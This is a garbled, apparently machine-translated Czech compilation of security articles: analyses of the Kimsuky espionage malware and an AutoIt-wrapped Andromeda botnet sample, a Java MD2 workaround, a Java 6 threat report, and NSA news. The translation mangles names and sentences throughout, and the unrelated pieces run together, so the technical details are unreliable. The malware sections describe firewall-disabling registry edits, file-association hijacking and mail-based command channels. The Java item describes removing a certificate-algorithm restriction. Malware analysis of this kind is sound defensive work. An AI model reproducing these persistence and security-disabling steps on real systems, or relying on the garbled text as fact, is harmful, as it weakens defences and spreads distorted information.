Veřejnost e-mailového serveru v pochybnost byla Bulharština - mail.bg . Kompilace řetězec cesty obsažené korejské hieroglyfy. Tyto dvě skutečnosti nucen se blíže podívat na tento malware - korejské překladače vedle bulharských e-mailové velení a řízení komunikace.
Kompletní nalezena cesta v malware představuje některé korejské řetězce:
D: \ rsh \ 공격 \ UAC_dll (완성) \ Release \ test.pdb
"Rsh" slovo, podle všeho, znamená zkrácení "Remote Shell" a korejská slova mohou být přeloženy do angličtiny jako "útok" a "doplnění", tj.:
Ačkoli úplný seznam obětí zůstává neznámý, se nám podařilo identifikovat několik cílů této kampaně. Podle naší technické analýzy, útočníci měli zájem zaměření těchto organizací. "
Sejong Institute
Sejong Institute je nezisková soukromá organizace pro veřejný zájem a vedoucí think tank v Jižní Koreji, provádí výzkum na strategii národní bezpečnosti, sjednocení strategie, regionální otázky a mezinárodní politické ekonomie.
Korea ústav pro obranu analýz (KIDA)
KIDA je komplexní obranný výzkum institucí, která zahrnuje širokou škálu produktů pro obranné účely záležitostí. KIDA je organizována do sedmi výzkumných center: Centrum pro bezpečnost a strategie, Centrum pro vojenské plánování, Centrum pro rozvoj lidských zdrojů, Centrum pro řízení zdrojů, Centrum pro studia zbraňových systémů; Centrum pro studium informační systém a Centrum pro modelování a simulace. KIDA má také IT Consulting Group a různé podpůrné oddělení. Kida posláním je přispět k racionální obranu politiky prostřednictvím intenzivní a systematické výzkumu a analýzy obranných otázkách.
Ministerstvo sjednocení
Ministerstvo sjednocení je výkonným útvarem Jihokorejská vláda odpovědná za činnost směřující k sjednocení Koreje. Jeho hlavní úkoly jsou: stanovení severokorejskou politiku, koordinaci inter-korejské dialog, sledovat inter-korejské spolupráce a vzdělávání veřejnosti o sjednocení.
Hyundai Merchant Marine
Hyundai Merchant Marine je jihokorejská společnost poskytující logistické služby po celém světě Kontejnerová přeprava.
Některé indicie rovněž naznačují, že počítače, které patří do "příznivců korejské sjednocení" ( http://www.unihope.kr/ ) byly také zaměřeny. Mezi organizacemi se počítá, jsou 11 se sídlem v Jižní Koreji a dvě jednotky jsou umístěny v Číně.
Částečně proto, že tato kampaň je velmi omezený a vysoce cílené, jsme se zatím nepodařilo zjistit, jak je to malware rozděluje. Škodlivého vzorky, které jsme našli, jsou v rané fázi malware nejčastěji dodává kopí phishingové e-maily.
Infikování systému
Počáteční Trojan kapátko je Dynamic Link Library fungující jako zavaděč pro další malware. Nezáleží udržovat vývoz a jednoduše přináší další šifrované knihovny zachována ve své části zdrojů. Tato druhá knihovna plní všechny funkce špionáže.
Při spuštění v systému Windows 7, škodlivý knihovna využívá frameworku Metasploit je open-source kód Win7Elevate na vložení škodlivého kódu do explorer.exe . V každém případě, ať už je to Windows 7 nebo ne, tento škodlivý kód dešifruje jeho špionážní knihovnu ze zdrojů, uloží na disk se zdánlivě náhodně, ale hardcoded jména, například ~ DFE8B437DD7C417A6D.TMP , v uživatelském dočasné složky a načte tento obrázek jako knihovna.
Tato další fáze knihovna kopíruje do System32 adresáře ve složce Windows po hardcoded názvu souboru - buď KBDLV2.DLL nebo AUTO.DLL , v závislosti na malware vzorku. Pak služba je vytvořen pro servisní DLL. Servisní jména také se mohou lišit od verze na verzi, jsme zjistili následující jména - DriverManage, webové služby a WebClientManager . Tyto funkce zajišťují malware vytrvalost narušenou OS mezi restartování systému.
V této fázi, malware shromažďuje informace o infikovaném počítači. To zahrnuje výstup systeminfo příkazu uloženého v souboru oledvbs.inc následováním hardcoded cesta: C: \ Program Files \ Common Files \ System \ Ole DB \ oledvbs.inc . Tam je další funkce nazvaná - malware vytvoří řetězec obsahující počítač a uživatelská jména, ale to není používán kdekoliv. Podle všeho se jedná o chybu v malware autorem. Později, přijdeme do funkce, takový řetězec by mohl být relevantní, ale malware není schopen najít tato data v místě, kde by měla být. Tyto kroky jsou přijata pouze v případě, že běží v infikovaném systému poprvé. Na startu systému, škodlivý knihovna provádí špionáž činnosti, které potvrzuje, že je načten obecným svchost.exe procesu.
Špehování moduly
Existuje mnoho škodlivých programů zapojených do této kampaně, ale kupodivu, každý z nich implementovat jednu špionážní funkce. Kromě základní knihovny ( KBDLV2.DLL / AUTO.DLL ), která je odpovědná za společnou komunikaci s jeho kampaně pána, byli jsme schopni najít modulů, které vykonávají následující funkce:
Na startu systému, základní knihovna zakáže systému firewall a všechny AhnLab firewallu (Jihokorejská bezpečnostní produkt prodejce) od vynulování související hodnoty registru:
To také vypne Centrum zabezpečení systému Windows službu, aby se zabránilo upozorní uživatele o zdravotně postižené firewall.
Není náhodou, že malware autor vybral AhnLab bezpečnostní produkt. Během našeho výzkumu Winnti , jsme se dozvěděli, že jeden z korejských obětí byl ostře kritizován v Jižní Koreji regulátorů pomocí zahraničních bezpečnostních produktů. Nevíme jistě, jak tato kritika ovlivnila další jihokorejské organizace, ale víme, že mnoho organizací, jihokorejský nainstalovat AhnLab bezpečnostní produkty. Proto tyto útočníci ani neobtěžujte se vyhnout výrobky zahraničních dodavatelů ', protože jejich cíle jsou pouze jihokorejská.
Jakmile je malware firewall zakáže AhnLab, zkontroluje, zda je soubor taskmgr.exe je umístěn v hardcoded C: \ WINDOWS \ složky. Pokud je soubor přítomen, spustí tento spustitelný soubor. Dále malware smyčky každých 30 minut, aby se zprávy a čekat na odpověď od operátora.
Komunikace
Komunikace mezi robotem a provozovatel protéká bulharské webové bezplatný e-mailový server ( mail.bg ). Bot udržuje napevno přihlašovací údaje pro jeho e-mailový účet. Po ověření, malware posílá e-maily na jinou přesně stanovenou e-mailovou adresu a čte e-maily z e-mailové schránky. Všechny tyto činnosti jsou prováděny pomocí "mail.bg" webové rozhraní s použitím funkcí systému WinInet API. Ze všech vzorků, které se nám podařilo získat, jsme extrahovali následující e-mailové účty použité v této kampani:
beautifl@mail.bg ennemyman@mail.bg fasionman@mail.bg happylove@mail.bg lovest000@mail.bg monneyman@mail.bg sportsman@mail.bg veryhappy@mail.bg Zde jsou dva "master" e-mailové adresy, na které roboty posílat e-maily jménem výše uvedených účtů. Jsou zprávy o stavu a předávat infikované systémové informace prostřednictvím příloh:
Chcete-li ohlásit nákazový status, malware čte z C: \ Program Files \ Common Files \ System \ Ole DB \ oledvbs.inc který obsahuje systeminfo výstup příkazu. Pokud soubor existuje, je odstraněna po přečtení.
Pak to čte uživatelsky související informace ze souboru sqlxmlx.inc ve stejné složce (vidíme řetězce odkazující na "UserID" komentáře v této části kódu). Ale tento soubor nebyl nikdy vytvořen. Jak si jistě vzpomínáte, tam je funkce, která by měla tyto údaje shromažďovány a měl chytá do tohoto sqlxmlx.inc souboru. Nicméně, na prvním spuštění se shromažďují informace o uživateli uložené do " xmlrwbin.inc " . To v praxi znamená, že malware spisovatel chybně kódované bot pro uložení informací o uživateli do špatného souboru. Tam je šance na mylném kódu i nadále pracovat - údaje o uživateli mohou být zkopírovány do zasílat informace haldy. Ale ne v tomto případě - v době psaní, shromáždil informace o uživateli proměnné, které by měly směřovat k xmlrwbin.inc souboru dosud nebyla inicializována, což je soubor psát k nezdaru. Vidíme, že sqlxmlx.inc není vytvořena k ukládání uživatelských informací.
Dále jsou zachycené kláves číst ze souboru a poslal na master. Klávesové zkratky jsou zaznamenány a uchovávány v obyčejném a konzistentní podobě v tomto souboru - oba názvy oken, které byly zadány a klíče Skutečné pořadí Vstup z klávesnice. Tato data se nachází v souboru C: \ Program Files \ Common Files \ System \ Ole DB \ msolui80.inc vytvořen externí Key Logger modul.
Všechna tato data jsou sloučeny do jednoho souboru xmlrwbin.inc, který je pak šifrován s RC4. Klíčem RC4 je generován jako MD5 hash náhodně generované 117-bajtů vyrovnávací paměti. Aby bylo možné dešifrovat údajů by útočník určitě vědět buď MD5 hash nebo celý obsah bufferu. Tato data je také odeslána, ale RSA šifrovaný. Malware vytvoří 1120 bit veřejný klíč, používá k šifrování 117-bajtů vyrovnávací paměti. Malware pak spojí všechny údaje, které mají být odeslány jako 128 bajtů bloku. Výsledná data se uloží do C: \ Program Files \ Common Files \ System \ Ole DB \ do souboru s názvem podle následujícího formátu:
"<system Time> _ účtu> na bulharské e server>. Txt", například "08191757_beautifl@mail.bg.txt".
Soubor je pak připojen k e-mailu a poslal na magisterském e-mailový účet. Po přenosu, je okamžitě odstraněn ze systému oběti.
Získání magisterského údajů
Malware také načítá instrukce z poštovního serveru. Kontroluje e-maily v bulharském e-mailový účet s určitou značkou. Identifikovali jsme několik "Předmět značky" v síťové komunikaci: Down_0 , Down_1, Happy_0, Happy_2 a ddd_3 . Po nalezení a e-mail udržuje přílohu, malware stáhne a uloží tuto přílohu s názvem souboru " msdaipp.cnt " v C: \ Program Files \ Common Files \ System \ Ole DB \ . Útočník může poslat další spustitelné soubory tímto způsobem. Spustitelné soubory jsou šifrované RC4 a pak připojen. Klíč pro dešifrování je napevno ve škodlivých vzorků. Je zajímavé, že stejný " rsh! @! # "řetězec je zachována u všech známých vzorků a slouží ke generování klíčů RC4. Jak bylo popsáno výše, malware vypočítá MD5 tohoto řetězce a používá hash jako jeho klíč k dešifrování RC4 spustitelný. Potom je prostý spustitelný klesl na disk jako " sqlsoldb.exe " a spustit, a pak se stěhoval do C: \ Windows složky s názvem souboru "taskmgr.exe" . Původní e-mail a jeho přílohy jsou pak odstraněny z bulharského e-mailové schránky.
Key logger
Další Key Logger modul není příliš složitý - prostě zachycuje úhozy na klávesnici a zapíše zadané klíče do C: \ Program Files \ Common Files \ System \ Ole DB \ msolui80.inc, a také zaznamenává aktivní okno název, kde uživatel stiskl klávesy . Viděli jsme stejný formát v Madi malware . K dispozici je také jedním z klíčových logger varianta, která se přihlásí úhozů do C: \ WINDOWS \ Setup.log .
Výpis adresáře kolektor
Další program, poslal obětem výčet všech jednotek v infikovaném systému a spustí následující příkaz na ně:
dir <písmeno_jednotky>: / / s / t /-c
V praxi se tento příkaz zapsán do C: \ WINDOWS \ msdatt.bat a uskutečňuje výstup přesměrován do C: \ WINDOWS \ msdatl3.inc . V důsledku toho, tento udržuje seznam všech souborů ve všech složkách na disku. Malware později přečte, že údaje a připojí se k obsahu souboru C: \ Program Files \ Common Files \ System \ Ole DB \ oledvbs.inc . V tomto bodě, " oledvbs.inc "již ukládá systeminfo výstup.
Je zajímavé, že jeden vzorek z kolektoru výpisu adresáře byl napaden neslavný "Viking" virus čínského původu. Některé z těchto virových úpravy putovali ve volné přírodě na pět let a jeho autoři či provozovatelé nikdy očekávat, že to skončí v tajném APT související špionážní nástroj. Pro útočníky je to určitě velký neúspěch. Nejen, že původní špionáže mít program známky známého škodlivého softwaru, který může být detekován anti-malware produkty, navíc útočníci jsou odhalení jejich skrytých činnost cyber-kriminálními gangy. Nicméně, podle všeho, útočníci si všiml nežádoucí přírůstek do své malware a zbavil infekce. To byl jediný vzorek nesoucí Viking virus.
Kvůli drahé práci malware s různými další soubory, není to na místě ukázat tyto "vztahy" v diagramu: HWP dokument zloděj
Tento modul zachytí NsP dokumentů na infikovaném počítači. Soubor HWP formát je podobný aplikace Microsoft Word dokumentů, ale podporuje Hangul, jihokorejský aplikace na zpracování textu ze svazku Office Hancom. Hancom společnosti je široce používán v Jižní Koreji. Tento malware modul pracuje nezávisle na ostatních a udržuje své vlastní bulharské e-mailový účet. Účet je napevno v modulu spolu s pánem na e-mail, na který se posílá zachycené dokumenty. Je zajímavé, že modul není vyhledat všechny soubory v NsP infikovaného počítače, ale reaguje pouze na ty, které jsou otevřeny uživatelem a ukradne jim. Toto chování je velmi neobvyklé pro dokument krást součásti a my nevidíme v jiných škodlivých toolkity.
Program kopíruje sám sebe jako <Hangul plné path> \ HncReporter.exe a změny standardního programu sdružení do registru otevřete NsP dokumentů. Provedete to tak, že změní následující hodnoty registru:
HKEY_CLASSES_ROOT \ Hwp.Document.7 \ shell \ open \ command nebo HKEY_CLASSES_ROOT \ Hwp.Document.8 \ shell \ open \ command Ve výchozím nastavení je nastavení registru "<Hangul plný path> \ Hwp.exe" "% 1" sdružující Hangul aplikace " Hwp.exe " s dokumenty NsP Ale škodlivý program, nahradí tento řetězec s následující:.. "<Hangul úplná cesta> \ HncReporter.exe ""% 1 " . Takže, když se uživatel je otevření jakéhokoli dokumentu. NsP je malware program sám popraven otevřít. NsP dokument. Po tomto registru upravit, jakékoli otevření . HWP je dokument číst a poslat jako přílohu e-mailu s předmětem " NsP "na útočníky. Po odeslání malware vykonává skutečnou Hangul aplikaci pro zpracování textu " Hwp.exe " otevřete. NsP dokument jako uživatel zamýšlel. Znamená, že oběť pravděpodobně ani nevšimnete krádež. NsP souboru. Modul je zaslání rutinní závisí na následujících souborů v C: \ Program Files \ Common Files \ System \ Ole DB složky: xmlrwbin.inc, msdaipp.cnt, msdapml.cnt, msdaerr.cnt, msdmeng.cnt a oledjvs.inc .
Dálkové ovládání modulu downloader
Další program je určen výhradně stahovat přílohy z příchozích e-mailů s určitou značkou. Tento program je podobný modul čepu, ale s omezenou funkčností: zachovává hardcoded bulharské e-mailový účet, přihlásí, čte příchozí e-maily a hledá speciálního předmětu tagu " týmu ". Když najde, načte související přílohu, klesne to na pevném disku jako C: \ Program Files \ Common Files \ System \ Ole DB \ taskmgr.exe a spustí. Tento konkrétní spustitelný dorazí bez šifrování.
Dálkové ovládání modulu
Je také zajímavé, že malware autor nebyl zakázku vytvořit backdoor program. Místo toho, autor upravené TeamViewer klientskou verzi 5.0.9104. Počáteční spustitelný tlačil útočníky v e-maily související s dálkovým ovládání modulu se skládá ze tří dalších spustitelných souborů. Dva z nich jsou součástí týmu Viewer sami, a jiný je nějaký backdoor nakladače. Takže, kapátko vytvoří tři soubory v C: \ Windows \ System32 adresáře:
netsvcs.exe - upravený Team Viewer klientem; netsvcs_ko.dll - zdroje knihovna klienta Team Viewer; vcmon.exe - installer / startér; a vytváří služby " Remote Access Service ", upravena k provedení C: \ Windows \ System32 \ vcmon.exe při startu systému. Pokaždé, když vcmon.exe je proveden, zakáže AhnLab firewall od vynulování následující hodnoty registru:
HKLM \ SOFTWARE \ AhnLab \ V3 365 Clinic \ InternetSec UseFw = 0 UseIps = 0 Pak se upraví nastavení Team Viewer registru. Jak jsme již řekli, komponenty Team Viewer použité v této kampani nejsou ty původní. Jsou mírně upraven. Celkově bylo zjištěno, dvě různé varianty pozměněné verze. Malware autor nahradil všechny položky z " TeamViewer strun "v týmu Viewer komponent. V prvním případě se " Goldstager "řetězec a řetězec" Coinstager "ve druhém. TeamViewer klienta Nastavení registru jsou pak HKLM \ Software \ Goldstager \ Version5 a HKLM \ Software \ Coinstager \ Version5 odpovídajícím způsobem. Launcher nastaví několik hodnoty registru, které řídí, jak nástroj pro vzdálený přístup bude fungovat. Mezi nimi je SecurityPasswordAES . Tento parametr představuje hodnotu hash hesla, s nimiž vzdálený uživatel má připojit ke klientovi Team Viewer. Tímto způsobem, útočníci nastavit předem sdílený ověřovací hodnotu. Za to, že startér provede samotnou Team Viewer klienta netsvcs.exe .
Kdo je Kim?
Je zajímavé, že pokles box mailových účtů iop110112@hotmail.com a rsh1213@hotmail.com jsou registrovány s těmito názvy "Kim": kimsukyang a "Kim asdfa" .
Samozřejmě, že nemůžeme být jisti, že se jedná o skutečné jména útočníků. Nicméně, není tento výběr často vidět. Možná je to také poukazuje na podezřelé severokorejského původu útoku. S ohledem na profily cílových organizací - Jihokorejský vysokých škol, které provádějí výzkumy na mezinárodních záležitostech, produkovat obranné politiky vlády, národní lodní společnosti, podporovat skupiny pro korejské sjednocení - dalo by se jednoduše podezření, že útočníci mohou být ze Severní Koreje .
Cíle téměř dokonale spadají do oblasti jejich zájmu. Na druhou stranu, není to tak těžké zadat libovolný registrační informace a uvést v omyl vyšetřovatelům na zjevnou severokorejského původu. Nestojí nic vymyslet falešné registrační údaje a zadejte kimsukyang při registraci Hotmail. Jsme připustit, že tento registrační údaje neposkytuje konkrétní, nespornou informace o útočníků.
Nicméně útočníků IP-adresy se poskytnout nějaké další stopy. V naší analýze jsme sledovali deset IP adres používaných v Kimsuky operátorů. Všechny z nich leží v rozsahu sítě provincii Jilin provincie Liao-ning a sítě, v Číně.
Žádné další IP-adresy byly odkryté, které by poukazovaly na činnosti útočníků a patří do jiných IP rozsazích. Je zajímavé, že poskytovatelé internetových služeb, které poskytují přístup k internetu v těchto provinciích také věřil k udržení linky do Severní Koreje. Konečně, tato geo-umístění podporuje teorii pravděpodobné, že útočníci stojí za Kimsuky se sídlem v Severní Koreji.
Příloha
Soubory používané malware:
% Windir% \ system32 \ kbdlv2.dll % Windir% \ system32 \ auto.dll % Windir% \ system32 \ netsvcs.exe % Windir% \ system32 \ netsvcs_ko.dll % Windir% \ system32 \ vcmon.exe % Windir% \ system32 \ svcsmon.exe % Windir% \ system32 \ svcsmon_ko.dll % Windir% \ system32 \ wsmss.exe % Temp% \ ~ DFE8B437DD7C417A6D.TMP % Temp% \ ~ DFE8B43.TMP % Temp% \ ~ tmp.dll C: \ Windows \ taskmgr.exe C: \ Windows \ Setup.log C: \ Windows \ winlog.txt C: \ Windows \ Update.log C: \ Windows \ wmdns.log C: \ Windows \ oledvbs.inc C: \ Windows \ weoig.log C: \ Windows \ data.dat C: \ Windows \ sys.log C: \ Windows \ PcMon.exe C: \ Windows \ Update.exe Google C: \ Windows \ ReadMe.log C: \ Windows \ msdatt.bat C: \ Windows \ msdatl3.inc C: \ Program Files \ Common Files \ System \ Ole DB \ msdmeng.cnt C: \ Program Files \ Common Files \ System \ Ole DB \ xmlrwbin.inc C: \ Program Files \ Common Files \ System \ Ole DB \ msdapml.cnt C: \ Program Files \ Common Files \ System \ Ole DB \ sqlsoldb.exe C: \ Program Files \ Common Files \ System \ Ole DB \ oledjvs.inc C: \ Program Files \ Common Files \ System \ Ole DB \ oledvbs.inc C: \ Program Files \ Common Files \ System \ Ole DB \ msolui80.inc C: \ Program Files \ Common Files \ System \ Ole DB \ msdaipp.cnt C: \ Program Files \ Common Files \ System \ Ole DB \ msdaerr.cnt C: \ Program Files \ Common Files \ System \ Ole DB \ sqlxmlx.inc <Hangul Plný path> \ HncReporter.exe Související MD5:
DriverManage WebService WebClientManager Remote Access Service Zjistíme, jak těmto hrozbám Trojan.Win32.Kimsuky kromě upravených týmu Viewer komponent klienta, které jsou zjištěny při Trojan.Win32.Patched.ps .
Andromeda Botnet se skrývá za AutoIt 14.9.2013 BotNet | Viry
Minulý měsíc jsem zveřejnil blog o zvýšení využívání AutoIt skript malware autorů provádět škodlivé aktivity. Útočníci používají AutoIt skripty po dlouhou dobu, a které jsou stále oblíbenější díky své flexibilní a silné povahy. Nyní jsme narazili další kus malware (který dopadá být součástí botnetu Andromeda) kompilována s AutoIt vykonat svůj škodlivý kód. Botnet využívá AutoIt skript skrýt své škodlivý kód a spustí kód pomocí AutoIt je API. Exe2Aut Program umí extrahovat obsah hlavního binárního souboru, jak je ukázáno níže: anrdomeda_autoit_decode Jak je uvedeno výše, skript je snadné pochopit, a klesne zdrojový soubor obsahující kód skriptu a dva vložené soubory-a.vbs a f.txt-, jejichž obsah je uveden níže: andromeda_files_dropped Vypadají jako jednoduché textové soubory. Skript kapky kopii sebe sama ve start-up firem s názvem config.exe. To zkopíruje klesl soubory do dočasné složky a spustí a.vbs, který obsahuje base64 řetězec a kód na dešifrování. Po proveden, bude malware klesne jiný soubor, ensambla.txt, ve složce Temp. Skript volá DllStructCreate (), která vytvoří strukturu podobnou ve stylu C / C + + pro použití v DllCall () pro f.txt a ensambla.txt. Skript spustí další dvě lokální proměnné, které obsahují binární data pomocí Execute (BinaryToString ()). Pojďme se pop-up ty proměnné pomocí AutoIt MsgBox () funkce vidět skutečný kód: andromeda_varibales Skript nastaví data DLL strukturu a provádí DLL proceduru pomocí AutoIt je DllCall () funkce. Soubor f.txt obsahuje "MZ" záhlaví, škodlivý kód, který se ukázal být nový Andromeda botnet vzorek. (Několik nedávných blogy vztahuje Andromeda, jeden z nich publikoval pěkný rozbor.) kód z publikovaných blogů vypadá velmi podobný našemu snížil souboru, ale různé CRC32 hashe pro názvy procesů, na začátku kódu přitáhl mou pozornost. Po nějaké analýze se ukázalo, že varianta Andromeda používáte vlastní algoritmus pro generování hash pro názvy procesů, jak je uvedeno níže: andromeda_custom_hash_algo Na začátku, binární kontroluje název mutex "lol", shromažďuje běh názvy procesů, vypočítá hash pomocí vlastního algoritmu, a porovnává je s natvrdo kódovaných hash. Našel jsem několik zjevných názvy procesů, ale ne všechny. (Já bych rád poděkoval kolegovi Subrat sarkar, který rychle napsal utilitku na základě předchozího algoritmu je mi vlastní hash pro názvy procesů, jak je ukázáno níže.: andromeda_custom_hash_utility Hádat všechny názvy procesů spolu s natvrdo kódovaných hash ručně by být špatný nápad. Takže myšlenka je shromáždit všechny Antimalware nástroje, VMware / VirtualBox / Sandboxie, a další jsou analytické nástroje názvy procesů, generovat a porovnat hodnoty hash. To nám pomůže určit všechny názvy procesů, tento binární hledá. Tak jsem rychle napsal skript v Perlu pro generování hash všech kandidátů, jak je uvedeno níže: andromeda_perl_hash_output Byl jsem schopen získat všechny názvy procesů používaných v této binární. Všechny pevný kódované hashe odpovídají názvy procesů, uvedených níže: andromeda_all_process_names Není-li odpovídající proces nalezen, pak to bude kontrolovat sbiedll.dll Sandboxie je. andromeda_sbiedll_check Andromeda trik nepodaří Byl jsem si vědom proti VMware a antidebugging trik používá Andromedy. Zkontroluje, zda používáte virtuální stroj tím, že hledá klíče pod "System \ CurrentControlSet \ Services \ disk \ enum" klíč registru a pak dělá řetězec odpovídající a načasování zkontrolovat pomocí "rdtsc" návod na antidebugging. Ale oba triky nepodařilo pro tento binární. Podívejme se proč. andromeda_failed_checks Trik použít k získání řetězec "vmaw", "vbox" nebo "qemu" se nezdaří, protože VMware 9 má jinou strunu v registru. Tak EAX 8 nepodaří získat požadované řetězec. I když se zjistí, trik "awmv" (opak "vmwa"), pro starší verze VMware, zkontroluje pomocí "61776D77", což v přepočtu na znaky se stane "awmw." Pevně hex řetězec je špatně v tomto případě ( protože poslední byte, 77, je v pořádku). To by mělo být "61776D76," což v přepočtu na znaky se "awmv." Binární obsahuje antidebugging kód pomocí rdtsc instrukci, která nemá instrukce skoku pro ukončení (takže můžete pokračovat v analýze bez obav). Jsem nebyl přesvědčen o těchto neúspěšných kontrol a myslel tyto nedostatky by mohla existovat pouze pro tuto konkrétní binární. Křížové kontroly Prohlédl jsem si několik vzorků generovaných Andromeda 2,06 stavitel (unikly na internetu) a našel všechny tyto nedostatky existují ve všech binárních souborů. Jakmile se obejít všechny antireversing triky, binární volá hlavní náklad, který vytváří proces Wuauclt.Exe Windows (Windows Update) v prašném režimu, jak je uvedeno níže: andromeda_createprocess Před tím, malware používá následující rozhraní API systému Windows k vytvoření různých sekcí a mapovat pomocí škodlivého kódu. andromeda_section_mapping Zajímavé je, že binární pak vstřikuje nějaký kód na vstupním bodu Wuauclt.Exe. Zde je kód injekce: andromeda_injected_code Binární vstřikuje "PUSH 000A13B9, ret" instrukce. Takže když se nazývá ZwResumeThread (), bude Wuauclt.Exe tlačit adresy "000A13B9" na zásobníku a zpět. Tímto způsobem škodlivý kód, bude spuštěn v kontextu Wuauclt.Exe procesu Windows, je uvedeno níže: andromeda_run_payload Řídicí server, je stále aktivní v době psaní tohoto blogu. Útočníci používají AutoIt skripty skrýt a nainstalovat škodlivý náklad. Tento příklad ukazuje, že AutoIt má snadný a účinný API pro spuštění škodlivého kódu. Vzorek Andromeda jsme analyzovali také nám ukazuje celou řadu metod používaných útočníky, včetně vlastní hash generace pro názvy procesů, anti-VMware/antidebugging technik a procesu vstřikování.
Java a Staré Hash algoritmy
13.9.2013 Zabezpečení
David, jeden z našich čtenářů, e-mailem wih otázku - když se snaží komunikovat s konkrétním tiskovém ovladači dostane chybu Java:
PKIX cesta ověření se nezdařilo: java.security.cert.CertPathValidatorException: Algoritmus omezení se nepodařilo zjistit: MD2withRSA
Tato chyba je, protože jako Java 7, MD2 zatřiďování a jakékoli RSA 1024 bitů za hash jsou zakázány. Protože se jedná o (velmi) starý ovladač tiskárny, skutečnost, že se stále používá MD2 není překvapení - ale to, co dělat dál?
OK - Zřejmá odpověď je upgrade z problému - v případě, že řidič má aktualizace aplikovat. Ale jak se dostaneme k rozhraní dané situace Java? Odpověď je pohřben v konfiguračních souborech Java - editujte soubor java.securty, která ve Windows se nachází na adrese: "C: \ Program Files (x86) \ Java \ jre7 \ lib \ security"
V tomto souboru najdete řádek: jdk.certpath.disabledAlgorithms = MD2, RSA KeySize <1024
Upravit nebo komentář mimo tento řádek a MD2 bude pracovat pro vás znovu. Ale nenechávejte to takhle - to umožňuje všechny ty CERT se slabým hash, který vás nechá otevřené do světa bolesti. V tomto případě dostane přístup zpět do rozhraní, takže můžete upgradovat na novější verzi. Pokud není k dispozici novější verze, to vám dává přístup, dokud můžete upgradovat hardware nebo aplikaci, která je příčinou problému.
Útoky na nepodporovaný Java 6 jsou na vzestupu 13. září 2013. Zranitelnosti | Hrozba Jak předpovídal na konci roku 2012 a dokládá stále se rozšiřující použití exploit kity, zranitelnosti v populární a rozšířený software, jako je například Acrobat Reader Java a Adobe a Flash jsou na vrcholu seznamu z nejvíce využívány podvodníci z internetu.
Zero-da y chyby jsou menší problém, než ty staré - ve skutečnosti, vzhledem k tomu, že mnoho lidí stále používají starší, zranitelné softwarové verze softwaru, ovládat využije nulového dnů je prakticky zbytečné průměrného Cyber podvodník, který jde po penězích . A situace je asi dostat mnohem horší, říká, že Trend Micro Threat Communications Manager Christopher Budd. "Jsme svědky útoků zaměřených neopravených zranitelností v Javě 6, široce nasazen ale nikdo není podporována verze Javy. A my jsme svědky nárůst sofistikovanosti útoků s útočníky vykonávajících nižší úrovně útoky proti Layer Native Java, "řekl píše . Oracle ukončuje podporu Java 6 v únoru 2013, což znamená, že žádné další opravy zabezpečení. "Zatímco prodejce ukončení podpory a již poskytuje bezpečnostní opravy není nová věc, skutečnost, že více než 50% uživatelů se tam stále běží Java 6 je to bezprecedentní situace," řekl poukazuje. Po odhalení rozšířené aktivní využívání Java zero-day v lednu 2013, několik bezpečnostních expertů vyzývají uživatele, aby vypnutí Javy, pokud jej nepotřebujete. Několik měsíc dříve, Apple se rozhodl opustit aktualizaci Javy 7 k Oracle a odinstalovat svou Java applet plug-in ze všech webových prohlížečů (uživatelé mohou stáhnout poté od Oracle, pokud chtějí). Nicméně, stále ještě existují některé tři miliardy přístroje tam ještě v Javě, a více než polovina z nich běží na falešnou Java 6. "A teď jsme svědky první instance aktivních útoků proti této velké skupiny zranitelných cílů. Se JAVA_EXPLOIT.ABC útoku, jehož cílem CVE- 2013-2463 máme opravenou Java 7 zranitelnosti, které je unpatched na Java 6 a byl napaden. Zatímco útoky nejsou příliš rozšířeny ještě bylo začleněno do sady Exploit Neutrino což ukazuje na vysokou pravděpodobností rostoucí útoky proti této chybě zabezpečení "Budd sdílené s tím, že je to jen první" v tom, co je jistý, že probíhající série útoků proti neopravených zranitelností Java 6. " Naléhá, Java uživatelům buď zakázat, pokud to není nutné, nebo jej aktualizovat na nejnovější verze. Pokud žádná z těchto věcí jsou možné, měly by ostatní aktivní ochrany považovat. Také se obává, že s blížící se odchod do důchodu systému Windows XP , který je předpokládán i nadále používat o 33 procent uživatelů Windows v dubnu 2014 a je v současné době nejčastěji ohrožena verze operačního systému, bude toto sdružení potenciálních obětí ještě větší.
NSA říká, že nelegální sběr dat byl způsoben příliš složité tech 13. září 2013. KyberSecurity | Zabezpečení NSA opakované tvrzení o nutnosti jeho sledování zařízení pod kontrolou vzít další hit poté, co agentura byla právně nucen vydávat obrovské dávky předtím klasifikovaných dokumentů. Mimo jiné, jeden z dokumentů vyplynulo, že NSA "byl nesprávně zpochybnil hromadné telefonování metadata pomocí automatizovaného "Upozornûní" proces, který vyústil v použití selektorů, která nebyla individuálně zhodnotil a rozhodl se splnit si vyžaduje přiměřenou articulable podezření standard. " Jak to dopadá, v těchto třech letech agentura skončil sledování některých 17835 telefon účty, kdy jen 1935 z nich se setkal, že norma. ředitel Národní zpravodajské James Clapper nazval to jako "dodržování incidentů", který "pocházel z velké části z složitosti technologie použité v souvislosti s objemnější telefonie metadat programu , interakce těchto technologií s jinými systémy NSA, a nedostatek společného porozumění mezi různými složkami NSA o tom, jak některé aspekty komplexní architektury podporující program fungoval. " "Po objevu těchto událostí, které byly okamžitě hlášeny na FISC, Soudní dvůr v roce 2009 vydal rozkaz vyžadující NSA usilovat o soudní schválení dotaz telefonie metadata případ od případu, s výjimkou pokud je to nutné k ochraně proti bezprostředního ohrožení lidského života, "říká. "Poté, NSA dokončila end-to-end recenze a udělal několik kroků k nápravě těchto problémů, včetně vytváření technologických opravy, zlepšení vzdělávání a zavádění nových dozorových postupů. Tyto kroky k nápravě pak byly hlášeny Soudnímu dvoru, a v září 2009, Soud zvedl požadavek NSA usilovat o souhlas k dotazu na telefonní metadata případ od případu a od té doby neustále reauthorized tento program. " Není to poprvé, že FISC soud slyšel od NSA, že to byl "omylem" zpronevěra dat a / nebo sdělení, že nemá právoplatné svolení ke dělat. Nicméně FISC soudci opakovaně ukázaly být soucitný a nebyly rozhodl skoncovat s programem sledování. V tomto konkrétním případě, ale pouze dočasně omezen přístup k údajům týmem analytiků NSA integrity dat. ERF a Trevor Tim rovněž poukázal na to, že klapky říkal, že oni byli uvolnění dokumenty, protože směřovalo k tomu prezidenta USA . "Toto tvrzení je zavádějící," řekl poukázal . "Jsou této informace, protože soud nařídil jim, aby jako součást svobody EFF soudního řízení informačního zákona, podané před téměř dvěma lety na desátým výročím Patriot Act." "Je neuvěřitelné, zpravodajských služeb dnes řekl, že nikdo na NSA plně pochopil, jak jeho vlastní kamerový systém pracoval v té době, takže se nemohli adekvátně vysvětlit soudu, To je úžasné vstupné. NSA dohled přístroje pro let, byla tak složitá a rozčleněný, že žádný člověk mohl pochopit, " dodal. 